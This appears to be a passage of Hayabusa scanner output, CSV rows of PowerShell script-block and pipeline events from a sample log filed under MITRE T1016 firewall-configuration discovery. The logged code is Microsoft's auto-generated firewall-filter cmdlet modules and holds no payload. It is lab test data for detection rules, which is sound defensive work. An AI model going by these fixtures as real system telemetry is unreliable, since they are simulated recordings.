[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetInterfaceFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallInterfaceFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByInterface"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByInterface"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""InterfaceAlias""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""InterfaceAlias""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, 